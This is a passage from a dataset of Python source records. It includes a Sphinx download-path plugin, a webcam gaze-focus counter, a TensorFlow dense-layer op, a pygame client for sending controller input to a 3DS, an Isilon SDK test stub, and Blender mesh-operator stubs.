"\"\"\"\nSphinx is hardcoded to interpret links to downloadable files relative to the root of the docs\nsource tree. However, the downloadable files we want to use (tarballs of our examples directories)\nare themselves generated at build time, and we would therefore like them to be separate from the\nsource. This module is a Sphinx plugin that replaces the normal interpretation of links, causing\nSphinx to look for downloads relative to a different directory (which is set in `conf.py`).\n\"\"\"\n\nimport logging\nimport os\nimport types\nfrom typing import Any, Dict\n\nfrom docutils import nodes\nfrom sphinx import addnodes, application\nfrom sphinx.environment.collectors import asset\nfrom sphinx.locale import __\n\nlogger = logging.getLogger(__name__)\n\n\nclass DownloadExternalFileCollector(asset.DownloadFileCollector):\n def process_doc(\n self: asset.DownloadFileCollector, app: application.Sphinx, doctree: nodes.document\n ) -> None:\n \"\"\"\n This function is different from the original method only in doing some surgery on the paths\n it finds when a separate root directory is configured.\n \"\"\"\n for node in doctree.traverse(addnodes.download_reference):\n targetname = node[\"reftarget\"]\n if \"://\" in targetname:\n node[\"refuri\"] = targetname\n else:\n rel_filename, filename = app.env.relfn2path(targetname, app.env.docname)\n if app.config.dai_downloads_root:\n filename = os.path.abspath(\n os.path.join(app.config.dai_downloads_root, rel_filename)\n )\n rel_filename = os.path.relpath(filename, app.env.srcdir)\n app.env.dependencies[app.env.docname].add(rel_filename)\n if not os.access(filename, os.R_OK):\n logger.warning(__(\"download file not readable: %s\") % filename)\n continue\n node[\"filename\"] = app.env.dlfiles.add_file(app.env.docname, rel_filename)\n\n\ndef setup(app: application.Sphinx) -> Dict[str, Any]:\n app.add_config_value(\"dai_downloads_root\", None, \"html\")\n\n # Disable the old instance of DownloadFileCollector and replace it with ours.\n for event in app.events.listeners.values():\n for listener_id, callback in list(event.items()):\n if isinstance(callback, types.MethodType) and isinstance(\n callback.__self__, asset.DownloadFileCollector\n ):\n del event[listener_id]\n app.add_env_collector(DownloadExternalFileCollector)\n\n return {\n \"version\": \"0\",\n \"parallel_read_safe\": True,\n \"parallel_write_safe\": True,\n }\n"} {"ext": "py", "sha": "1a30470af116bd430d5b4d5ce4f8e73688b844ba", "content": "# Analytics Collector\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\ndef startCam():\n import cv2\n from gaze_tracking import GazeTracking\n import time\n\n gaze = GazeTracking()\n webcam = cv2.VideoCapture(0)\n startTime = time.time()\n totalFrames = 0\n framesDistracted = 0\n framesFocused = 0\n\n while True:\n _, frame = webcam.read()\n totalFrames += 1\n gaze.refresh(frame)\n frame = gaze.annotated_frame()\n\n if gaze.is_blinking():\n framesDistracted += 1\n elif gaze.is_right():\n framesDistracted += 1\n elif gaze.is_left():\n framesDistracted += 1\n elif gaze.is_center():\n framesFocused += 1\n else:\n framesDistracted += 1\n\n cv2.imshow(\"Camera\", frame)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n webcam.release()\n cv2.destroyAllWindows()\n\n totalTime = truncate(time.time() - startTime, 2)\n percentFocused = truncate((framesFocused / totalFrames) * 100, 2) \n percentDistracted = truncate((framesDistracted / totalFrames) * 100, 2)\n\n return totalTime, percentFocused, percentDistracted\n"} {"ext": "py", "sha": "1a30472cba36d282c6f9c892d0511320fa243516", "content": "# Copyright 2020 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Stateless ops for core Keras layers.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.ops import gen_math_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import sparse_ops\nfrom tensorflow.python.ops import standard_ops\n\n\n# TODO(b/157913406): Expose this publicly.\ndef dense(inputs, kernel, bias=None, activation=None, dtype=None):\n \"\"\"Densely connected NN layer op.\n\n Arguments:\n inputs: `tf.Tensor` or `tf.SparseTensor`. Inputs to operation.\n kernel: `tf.Variable`. Matrix kernel.\n bias: (Optional) `tf.Variable`. Bias to add to outputs.\n activation: (Optional) 1-argument callable. Activation function to apply to\n outputs.\n dtype: (Optional) `tf.DType`. Dtype to cast `inputs` to.\n\n Returns:\n `tf.Tensor`. Output of dense connection.\n \"\"\"\n if dtype:\n if inputs.dtype.base_dtype != dtype.base_dtype:\n inputs = math_ops.cast(inputs, dtype=dtype)\n\n rank = inputs.shape.rank\n if rank == 2 or rank is None:\n if isinstance(inputs, sparse_tensor.SparseTensor):\n outputs = sparse_ops.sparse_tensor_dense_matmul(inputs, kernel)\n else:\n outputs = gen_math_ops.mat_mul(inputs, kernel)\n # Broadcast kernel to inputs.\n else:\n outputs = standard_ops.tensordot(inputs, kernel, [[rank - 1], [0]])\n # Reshape the output back to the original ndim of the input.\n if not context.executing_eagerly():\n shape = inputs.shape.as_list()\n output_shape = shape[:-1] + [kernel.shape[-1]]\n outputs.set_shape(output_shape)\n\n if bias is not None:\n outputs = nn_ops.bias_add(outputs, bias)\n\n if activation is not None:\n outputs = activation(outputs)\n\n return outputs\n"} {"ext": "py", "sha": "1a3047b1b855d6f0466d6d2bdfd5df486d535650", "content": "#!/usr/bin/env python3\n\nfrom tpp.tppflush import *\nimport sys\nfrom math import fabs\ntry:\n\timport pygame\nexcept ImportError: \n\texit(\"Pygame required. Exiting.\")\n\ntry:\n\tfrom lib.controller import *\nexcept ImportError:\n\tjoystick_name=\"??\"\n\tj_axis=[ ]\n\t\n#buttons.py adds the following:\n#joystick_name=\"Microsoft X-Box 360 pad\"\n#buttons=['B', 'A', 'Y', 'X', 'L', 'R', 'SELECT', 'START', 'Home', 'Home', 'Home']\n#j_axis=[0, 1, 3, 4]\n\ndone=False\n\ncircx,circy = 160,120\ndeadZone=0.3 #send '0' if fabs joystick(0,1) is less than this value eg joystick_x=0.1, sends joystick_x=0.0\n\n#Default button mapping\nbuttonMappings = [\n\tHIDButtons.A,\n\tHIDButtons.B,\n\tHIDButtons.X,\n\tHIDButtons.Y,\n\tHIDButtons.SELECT, #Z\n\tHIDButtons.R,\n\tHIDButtons.L,\n\tHIDButtons.START,\n\tHIDButtons.DPADUP,\n\tHIDButtons.DPADDOWN,\n\tHIDButtons.DPADLEFT,\n\tHIDButtons.DPADRIGHT\n\t]\n\nclass KBDButtons(int):\n\tHOME = pygame.K_HOME\n\tPOWER = pygame.K_END\n\n#street fighter style layout on numberpad ([punches] y,x,L -> 4,5,6)\n#might be useful for joy2key apps\nKBbutt={\n\t257: HIDButtons.B, #numberpad 1\n\t258: HIDButtons.A,\n\t259: HIDButtons.R,\n\n\t260: HIDButtons.Y, #numberpad 4\n\t261: HIDButtons.X,\n\t262: HIDButtons.L,\n\n\t256: HIDButtons.START, #numberpad 0\n\t266: HIDButtons.SELECT, #numberpad .\n\t\n\t273: HIDButtons.DPADUP, #arrow key up\n\t274: HIDButtons.DPADDOWN,\n\t276: HIDButtons.DPADLEFT,\n\t275: HIDButtons.DPADRIGHT\n\t}\n\nif len(sys.argv) < 2:\n\t#this is the pop up window\n\timport tkinter as tk \n\tclass App:\n\t\tdef __init__(self, master):\n\t\t\tframe=tk.Frame(master)\n\t\t\tframe.pack()\n\t\t\t#reads file lastIP to get first line\n\t\t\ttry:\n\t\t\t\tf=open(\"lastIP\",\"r\")\n\t\t\t\tlast_ip=f.readline()\n\t\t\t\tf.close()\n\t\t\texcept FileNotFoundError:\n\t\t\t\tlast_ip=\" \"\n\t\t\tself.l_IP=tk.StringVar() \n\t\t\tself.l_IP.set(last_ip)\n\t\t\t#image banner (row 0, col 0)\n\t\t\tlumaIMG = tk.PhotoImage(file=\"lib/luma.png\")\n\t\t\tlumal = tk.Label(frame,image=lumaIMG)\n\t\t\tlumal.image = lumaIMG\n\t\t\tlumal.grid(row=0,columnspan=3)\n\t\t\t#places the 3 other elements (label, text box, button) on row 1\n\t\t\ttk.Label(frame, text='IP:',font=(\"Courier\", 22)).grid(row=1, column=0, sticky=tk.E)\n\t\t\ttk.Entry(frame,bg='white', width=15, textvariable=self.l_IP, font=(\"Courier\", 18)).grid(row=1,column=1, pady=10, sticky=tk.E+tk.W)\n\t\t\tbutton = tk.Button(frame, text='Go', font=(\"Courier\", 18), command=self.store)\n\t\t\tbutton.grid(row=1, column=2, sticky=tk.W, pady=10)\n\t\t\t#center label and butt\n\t\t\tframe.grid_columnconfigure(0, weight=1)\n\t\t\tframe.grid_columnconfigure(2, weight=1)\t\t\t\n\t\t\tmaster.bind('', self.store ) #\"enter\" key\n\t\t\tmaster.bind('', self.store ) # numeric \"enter\" key\n\t\t\t\t\t\t\n\t\tdef store(self, *args):\n\t\t\tglobal IP\n\t\t\tIP=self.l_IP.get() \n\t\t\tf=open(\"lastIP\",\"w\")\n\t\t\tf.write(IP.strip()) #stores data in text box (as string type)\n\t\t\tf.close()\n\t\t\troot.quit()\n\n\n\troot= tk.Tk()\n\troot.wm_title('3DS IP')\n\tApp(root)\n\troot.bind('', lambda x: quit())\n\troot.mainloop()\n\troot.destroy() #removes window\n\tserver = IP.strip()\nelse:\n\tserver = sys.argv[1]\n\nserver=LumaInputServer(server)\n\npygame.init()\nscreen = pygame.display.set_mode((320, 240))\n\npygame.display.set_caption('touchscreen')\nbotSr = pygame.image.load('lib/bottom.png')\nscreen.blit(botSr, (0,0))\nif len(j_axis)>=6 :\n\tpygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)\npygame.display.update()\n\npygame.joystick.init()\n\njoystick_count = pygame.joystick.get_count()\nprint(\"Number of joysticks: {}\".format(joystick_count) )\n\nif (joystick_count>0):\n\t#Only loads one joystick if multiple are connected. \n\tfor i in range(joystick_count):\n\t\tjoystick = pygame.joystick.Joystick(i)\n\t\tname = joystick.get_name()\n\t\tif name == joystick_name:\n\t\t\tbreak\n\n\tjoystick.init()\n\tprint(\"Using joystick \\\"{}\\\"\".format(name))\n\tif name == joystick_name:\n\t\tbuttonMappings=buttons\n\t\tprint(\"\\t--> loading \\\"{}\\\" layout\".format(joystick_name))\n\telse :\n\t\tprint(\"\\t(using default button layout)\")\n\n\tprint(\"\\t{} axes, {} buttons, {} hats\".format(joystick.get_numaxes(),joystick.get_numbuttons(),joystick.get_numhats()))\n\tfor i in range(joystick.get_numaxes()):\n\t\tj_axis.append(i)\nelse:\n\tprint(\"No controller found!\\n\\t(restricted to limited keyboard button layout)\")\n\nprint(\"\\nHOME = HOME key \\nPOWER = END key\\nEnd Program = ESC key\")\nwhile done==False:\n\t#Event L O O P\n\tfor event in pygame.event.get(): # User did something\n\t\tif event.type == pygame.QUIT: # If user clicked close\n\t\t\tdone=True\n\t\t#Touchscreen input\n\t\tif pygame.mouse.get_pressed()[0]:\n\t\t\tpos = pygame.mouse.get_pos()\n\t\t\tserver.touch(pos[0], pos[1])\n\t\t\t#print(\"THSC: \",pos[0],\",\",pos[1])\n\t\t\tserver.send()\n\t\telif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tserver.clear_touch()\n\t\t\tserver.send()\n\t\t\n\t\t#Keyboard Mappings\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == KBDButtons.HOME: #home\n\t\t\t\tserver.special_press(Special_Buttons.HOME)\n\t\t\t\t#print(\"HOME\")\n\t\t\tif event.key == KBDButtons.POWER: #power\n\t\t\t\tserver.special_press(Special_Buttons.POWER)\n\t\t\t\t#print(\"POWER\")\n\t\t\tif event.key == pygame.K_ESCAPE: #end program\n\t\t\t\tserver.clear_everything()\n\t\t\t\tdone = True\n\t\t\tif event.key in KBbutt:\n\t\t\t\tserver.hid_press(KBbutt[event.key])\n\t\t\t#print(event.key)\n\t\t\tserver.send()\n\t\t\t\t\n\t\telif event.type == pygame.KEYUP:\n\t\t\tif event.key == KBDButtons.HOME: #home\n\t\t\t\tserver.special_unpress(Special_Buttons.HOME)\n\t\t\tif event.key == KBDButtons.POWER: #power\n\t\t\t\tserver.special_unpress(Special_Buttons.POWER)\n\t\t\tif event.key in KBbutt:\n\t\t\t\tserver.hid_unpress(KBbutt[event.key])\n\t\t\tserver.send()\n\n\t\t# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION\n\t\tif event.type == pygame.JOYBUTTONDOWN :\n\t\t\t#print(\"Joystick {} button {} pressed.\".format(event.joy,event.button))\n\t\t\tserver.press(buttonMappings[event.button])\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYBUTTONUP:\n\t\t\t#print(\"Joystick {} button {} released.\".format(event.joy,event.button))\n\t\t\tserver.unpress(buttonMappings[event.button])\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYHATMOTION:\n\t\t\t#print(\"Joystick {} HATS moved to {}.\".format(event.joy, event.value)) \n\t\t\t(xhat, yhat) = event.value #[-1,0,1]\n\t\t\tif (xhat == 1): \n\t\t\t\tserver.press(HIDButtons.DPADRIGHT)\n\t\t\telif (xhat == -1): \n\t\t\t\tserver.press(HIDButtons.DPADLEFT)\n\t\t\telif (xhat == 0) :\n\t\t\t\tserver.unpress(HIDButtons.DPADRIGHT)\n\t\t\t\tserver.send()\n\t\t\t\tserver.unpress(HIDButtons.DPADLEFT)\n\t\t\tif (yhat == 1): \n\t\t\t\tserver.press(HIDButtons.DPADUP)\n\t\t\telif (yhat == -1): \n\t\t\t\tserver.press(HIDButtons.DPADDOWN)\n\t\t\telif (yhat == 0) :\n\t\t\t\tserver.unpress(HIDButtons.DPADDOWN)\n\t\t\t\tserver.send()\n\t\t\t\tserver.unpress(HIDButtons.DPADUP) \t\t\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYAXISMOTION:\n\t\t\t#xbox:Left Thumbstick | axis 0 : L/R | axis 1 : U/D\n\t\t\t#xbox: axis 2 : L trigger (-1:1)\n\t\t\t#xbox: Right Thumbstick | axis 3 : L/R | axis 4 : U/D\n\t\t\t#xbox: axis 5 : R trigger (-1:1)\n\t\t\t#if event.axis == 0: print(\"Joystick {} axis {} moved to {}.\".format(event.joy,event.axis, event.value))\n\t\t\t\n\t\t\tif event.axis == j_axis[0] : \n\t\t\t\tif fabs(event.value)>deadZone:\n\t\t\t\t\tserver.circle_pad_coords[0] = int(32767*event.value) #left_joy_x\n\t\t\t\telse:\n\t\t\t\t\t#note: circle_pad_neutral() == circle_pad_coords = [0,0] (that is both X and Y coords are set to zero)\n\t\t\t\t\tserver.circle_pad_coords[0] = int(0) #left_joy_x\n\t\t\t\tserver.send()\n\t\t\tif event.axis==j_axis[1] : \n\t\t\t\tif fabs(event.value)>deadZone:\n\t\t\t\t\tserver.circle_pad_coords[1] = int(-32767*event.value) #left_joy_y\n\t\t\t\telse:\n\t\t\t\t\tserver.circle_pad_coords[1] = int(0) #left_joy_y\n\t\t\t\tserver.send()\n\n#using the right trigger to touch the screen only works if you have a right trigger and right thumbstick\n\t\t\tif len(j_axis)>=6:\n\t\t\t\tif (event.axis in [j_axis[2], j_axis[3],j_axis[5]]): #r trig = mouse click\n\t\t\t\t\t(circx, circy)=(160+int(159*joystick.get_axis(j_axis[2])),120+int(119*joystick.get_axis(j_axis[3])))\n\t\t\t\t\t#draw location of touch point but only when joystick moves\n\t\t\t\t\tscreen.blit(botSr, (0,0))\n\t\t\t\t\tpygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)\n\t\t\t\t\tpygame.display.update()\n\t\t\t\t\tif (joystick.get_axis(j_axis[5])>0.0): #Want to be able to \"drag\"\n\t\t\t\t\t\tserver.touch(circx,circy)\n\t\t\t\t\t\tserver.send()\n\t\t\t\t\t\tpygame.draw.circle(screen, (255,255,255), (circx, circy), 3, 0)\n\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\tif event.axis == j_axis[5]: #r trig\n\t\t\t\t\t\tif event.value < 0: #less than half depression #notme_irl\n\t\t\t\t\t\t\tserver.clear_touch()\n\t\t\t\t\t\t\tserver.send()\n\nprint(\"\\nClearing everything and closing program\")\nserver.clear_everything()\npygame.quit()\n"} {"ext": "py", "sha": "1a30485ecd28afd50049a68d6a991861e5e272c5", "content": "# coding: utf-8\n\n\"\"\"\n Isilon SDK\n\n Isilon SDK - Language bindings for the OneFS API # noqa: E501\n\n OpenAPI spec version: 4\n Contact: sdk@isilon.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport isi_sdk_8_0_1\nfrom isi_sdk_8_0_1.models.drives_drive_firmware_node_drive import DrivesDriveFirmwareNodeDrive # noqa: E501\nfrom isi_sdk_8_0_1.rest import ApiException\n\n\nclass TestDrivesDriveFirmwareNodeDrive(unittest.TestCase):\n \"\"\"DrivesDriveFirmwareNodeDrive unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testDrivesDriveFirmwareNodeDrive(self):\n \"\"\"Test DrivesDriveFirmwareNodeDrive\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = isi_sdk_8_0_1.models.drives_drive_firmware_node_drive.DrivesDriveFirmwareNodeDrive() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a3048e8e169005c6280a5415dd78b0a24347b37", "content": "import sys\nimport typing\n\n\ndef average_normals(average_type: typing.Union[int, str] = 'CUSTOM_NORMAL',\n weight: int = 50,\n threshold: float = 0.01):\n '''Average custom normals of selected vertices \n\n :param average_type: Type, Averaging methodCUSTOM_NORMAL Custom Normal, Take Average of vert Normals.FACE_AREA Face Area, Set all vert normals by Face Area.CORNER_ANGLE Corner Angle, Set all vert normals by Corner Angle. \n :type average_type: typing.Union[int, str]\n :param weight: Weight, Weight applied per face \n :type weight: int\n :param threshold: Threshold, Threshold value for different weights to be considered equal \n :type threshold: float\n '''\n\n pass\n\n\ndef beautify_fill(angle_limit: float = 3.14159):\n '''Rearrange some faces to try to get less degenerated geometry \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n '''\n\n pass\n\n\ndef bevel(offset_type: typing.Union[int, str] = 'OFFSET',\n offset: float = 0.0,\n offset_pct: float = 0.0,\n segments: int = 1,\n profile: float = 0.5,\n vertex_only: bool = False,\n clamp_overlap: bool = False,\n loop_slide: bool = True,\n mark_seam: bool = False,\n mark_sharp: bool = False,\n material: int = -1,\n harden_normals: bool = False,\n face_strength_mode: typing.Union[int, str] = 'NONE',\n miter_outer: typing.Union[int, str] = 'SHARP',\n miter_inner: typing.Union[int, str] = 'SHARP',\n spread: float = 0.1,\n release_confirm: bool = False):\n '''Cut into selected items at an angle to create flat or rounded bevel or chamfer \n\n :param offset_type: Width Type, What distance Width measuresOFFSET Offset, Amount is offset of new edges from original.WIDTH Width, Amount is width of new face.DEPTH Depth, Amount is perpendicular distance from original edge to bevel face.PERCENT Percent, Amount is percent of adjacent edge length. \n :type offset_type: typing.Union[int, str]\n :param offset: Width, Bevel amount \n :type offset: float\n :param offset_pct: Width Percent, Bevel amount for percentage method \n :type offset_pct: float\n :param segments: Segments, Segments for curved edge \n :type segments: int\n :param profile: Profile, Controls profile shape (0.5 = round) \n :type profile: float\n :param vertex_only: Vertex Only, Bevel only vertices \n :type vertex_only: bool\n :param clamp_overlap: Clamp Overlap, Do not allow beveled edges/vertices to overlap each other \n :type clamp_overlap: bool\n :param loop_slide: Loop Slide, Prefer slide along edge to even widths \n :type loop_slide: bool\n :param mark_seam: Mark Seams, Mark Seams along beveled edges \n :type mark_seam: bool\n :param mark_sharp: Mark Sharp, Mark beveled edges as sharp \n :type mark_sharp: bool\n :param material: Material, Material for bevel faces (-1 means use adjacent faces) \n :type material: int\n :param harden_normals: Harden Normals, Match normals of new faces to adjacent faces \n :type harden_normals: bool\n :param face_strength_mode: Face Strength Mode, Whether to set face strength, and which faces to set face strength onNONE None, Do not set face strength.NEW New, Set face strength on new faces only.AFFECTED Affected, Set face strength on new and modified faces only.ALL All, Set face strength on all faces. \n :type face_strength_mode: typing.Union[int, str]\n :param miter_outer: Outer Miter, Pattern to use for outside of mitersSHARP Sharp, Outside of miter is sharp.PATCH Patch, Outside of miter is squared-off patch.ARC Arc, Outside of miter is arc. \n :type miter_outer: typing.Union[int, str]\n :param miter_inner: Inner Miter, Pattern to use for inside of mitersSHARP Sharp, Inside of miter is sharp.ARC Arc, Inside of miter is arc. \n :type miter_inner: typing.Union[int, str]\n :param spread: Spread, Amount to spread arcs for arc inner miters \n :type spread: float\n :param release_confirm: Confirm on Release \n :type release_confirm: bool\n '''\n\n pass\n\n\ndef bisect(plane_co: float = (0.0, 0.0, 0.0),\n plane_no: float = (0.0, 0.0, 0.0),\n use_fill: bool = False,\n clear_inner: bool = False,\n clear_outer: bool = False,\n threshold: float = 0.0001,\n xstart: int = 0,\n xend: int = 0,\n ystart: int = 0,\n yend: int = 0,\n cursor: int = 5):\n '''Cut geometry along a plane (click-drag to define plane) \n\n :param plane_co: Plane Point, A point on the plane \n :type plane_co: float\n :param plane_no: Plane Normal, The direction the plane points \n :type plane_no: float\n :param use_fill: Fill, Fill in the cut \n :type use_fill: bool\n :param clear_inner: Clear Inner, Remove geometry behind the plane \n :type clear_inner: bool\n :param clear_outer: Clear Outer, Remove geometry in front of the plane \n :type clear_outer: bool\n :param threshold: Axis Threshold, Preserves the existing geometry along the cut plane \n :type threshold: float\n :param xstart: X Start \n :type xstart: int\n :param xend: X End \n :type xend: int\n :param ystart: Y Start \n :type ystart: int\n :param yend: Y End \n :type yend: int\n :param cursor: Cursor, Mouse cursor style to use during the modal operator \n :type cursor: int\n '''\n\n pass\n\n\ndef blend_from_shape(shape: typing.Union[int, str] = '',\n blend: float = 1.0,\n add: bool = True):\n '''Blend in shape from a shape key \n\n :param shape: Shape, Shape key to use for blending \n :type shape: typing.Union[int, str]\n :param blend: Blend, Blending factor \n :type blend: float\n :param add: Add, Add rather than blend between shapes \n :type add: bool\n '''\n\n pass\n\n\ndef bridge_edge_loops(type: typing.Union[int, str] = 'SINGLE',\n use_merge: bool = False,\n merge_factor: float = 0.5,\n twist_offset: int = 0,\n number_cuts: int = 0,\n interpolation: typing.Union[int, str] = 'PATH',\n smoothness: float = 1.0,\n profile_shape_factor: float = 0.0,\n profile_shape: typing.Union[int, str] = 'SMOOTH'):\n '''Create a bridge of faces between two or more selected edge loops \n\n :param type: Connect Loops, Method of bridging multiple loops \n :type type: typing.Union[int, str]\n :param use_merge: Merge, Merge rather than creating faces \n :type use_merge: bool\n :param merge_factor: Merge Factor \n :type merge_factor: float\n :param twist_offset: Twist, Twist offset for closed loops \n :type twist_offset: int\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param interpolation: Interpolation, Interpolation method \n :type interpolation: typing.Union[int, str]\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded \n :type profile_shape_factor: float\n :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. \n :type profile_shape: typing.Union[int, str]\n '''\n\n pass\n\n\ndef colors_reverse():\n '''Flip direction of vertex colors inside faces \n\n '''\n\n pass\n\n\ndef colors_rotate(use_ccw: bool = False):\n '''Rotate vertex colors inside faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef convex_hull(delete_unused: bool = True,\n use_existing_faces: bool = True,\n make_holes: bool = False,\n join_triangles: bool = True,\n face_threshold: float = 0.698132,\n shape_threshold: float = 0.698132,\n uvs: bool = False,\n vcols: bool = False,\n seam: bool = False,\n sharp: bool = False,\n materials: bool = False):\n '''Enclose selected vertices in a convex polyhedron \n\n :param delete_unused: Delete Unused, Delete selected elements that are not used by the hull \n :type delete_unused: bool\n :param use_existing_faces: Use Existing Faces, Skip hull triangles that are covered by a pre-existing face \n :type use_existing_faces: bool\n :param make_holes: Make Holes, Delete selected faces that are used by the hull \n :type make_holes: bool\n :param join_triangles: Join Triangles, Merge adjacent triangles into quads \n :type join_triangles: bool\n :param face_threshold: Max Face Angle, Face angle limit \n :type face_threshold: float\n :param shape_threshold: Max Shape Angle, Shape angle limit \n :type shape_threshold: float\n :param uvs: Compare UVs \n :type uvs: bool\n :param vcols: Compare VCols \n :type vcols: bool\n :param seam: Compare Seam \n :type seam: bool\n :param sharp: Compare Sharp \n :type sharp: bool\n :param materials: Compare Materials \n :type materials: bool\n '''\n\n pass\n\n\ndef customdata_custom_splitnormals_add():\n '''Add a custom split normals layer, if none exists yet \n\n '''\n\n pass\n\n\ndef customdata_custom_splitnormals_clear():\n '''Remove the custom split normals layer, if it exists \n\n '''\n\n pass\n\n\ndef customdata_mask_clear():\n '''Clear vertex sculpt masking data from the mesh \n\n '''\n\n pass\n\n\ndef customdata_skin_add():\n '''Add a vertex skin layer \n\n '''\n\n pass\n\n\ndef customdata_skin_clear():\n '''Clear vertex skin layer \n\n '''\n\n pass\n\n\ndef decimate(ratio: float = 1.0,\n use_vertex_group: bool = False,\n vertex_group_factor: float = 1.0,\n invert_vertex_group: bool = False,\n use_symmetry: bool = False,\n symmetry_axis: typing.Union[int, str] = 'Y'):\n '''Simplify geometry by collapsing edges \n\n :param ratio: Ratio \n :type ratio: float\n :param use_vertex_group: Vertex Group, Use active vertex group as an influence \n :type use_vertex_group: bool\n :param vertex_group_factor: Weight, Vertex group strength \n :type vertex_group_factor: float\n :param invert_vertex_group: Invert, Invert vertex group influence \n :type invert_vertex_group: bool\n :param use_symmetry: Symmetry, Maintain symmetry on an axis \n :type use_symmetry: bool\n :param symmetry_axis: Axis, Axis of symmetry \n :type symmetry_axis: typing.Union[int, str]\n '''\n\n pass\n\n\ndef delete(type: typing.Union[int, str] = 'VERT'):\n '''Delete selected vertices, edges or faces \n\n :param type: Type, Method used for deleting mesh data \n :type type: typing.Union[int, str]\n '''\n\n pass\n\n\ndef delete_edgeloop(use_face_split: bool = True):\n '''Delete an edge loop by merging the faces on each side \n\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n '''\n\n pass\n\n\ndef delete_loose(use_verts: bool = True,\n use_edges: bool = True,\n use_faces: bool = False):\n '''Delete loose vertices, edges or faces \n\n :param use_verts: Vertices, Remove loose vertices \n :type use_verts: bool\n :param use_edges: Edges, Remove loose edges \n :type use_edges: bool\n :param use_faces: Faces, Remove loose faces \n :type use_faces: bool\n '''\n\n pass\n\n\ndef dissolve_degenerate(threshold: float = 0.0001):\n '''Dissolve zero area faces and zero length edges \n\n :param threshold: Merge Distance, Maximum distance between elements to merge \n :type threshold: float\n '''\n\n pass\n\n\ndef dissolve_edges(use_verts: bool = True, use_face_split: bool = False):\n '''Dissolve edges, merging faces \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n '''\n\n pass\n\n\ndef dissolve_faces(use_verts: bool = False):\n '''Dissolve faces \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n '''\n\n pass\n\n\ndef dissolve_limited(angle_limit: float = 0.0872665,\n use_dissolve_boundaries: bool = False,\n delimit: typing.Set[typing.Union[int, str]] = {'NORMAL'}):\n '''Dissolve selected edges and verts, limited by the angle of surrounding geometry \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n :param use_dissolve_boundaries: All Boundaries, Dissolve all vertices in between face boundaries \n :type use_dissolve_boundaries: bool\n :param delimit: Delimit, Delimit dissolve operationNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef dissolve_mode(use_verts: bool = False,\n use_face_split: bool = False,\n use_boundary_tear: bool = False):\n '''Dissolve geometry based on the selection mode \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces \n :type use_boundary_tear: bool\n '''\n\n pass\n\n\ndef dissolve_verts(use_face_split: bool = False,\n use_boundary_tear: bool = False):\n '''Dissolve verts, merge edges and faces \n\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces \n :type use_boundary_tear: bool\n '''\n\n pass\n\n\ndef dupli_extrude_cursor(rotate_source: bool = True):\n '''Duplicate and extrude selected vertices, edges or faces towards the mouse cursor \n\n :param rotate_source: Rotate Source, Rotate initial selection giving better shape \n :type rotate_source: bool\n '''\n\n pass\n\n\ndef duplicate(mode: int = 1):\n '''Duplicate selected vertices, edges or faces \n\n :param mode: Mode \n :type mode: int\n '''\n\n pass\n\n\ndef duplicate_move(MESH_OT_duplicate=None, TRANSFORM_OT_translate=None):\n '''Duplicate mesh and move \n\n :param MESH_OT_duplicate: Duplicate, Duplicate selected vertices, edges or faces \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef edge_collapse():\n '''Collapse 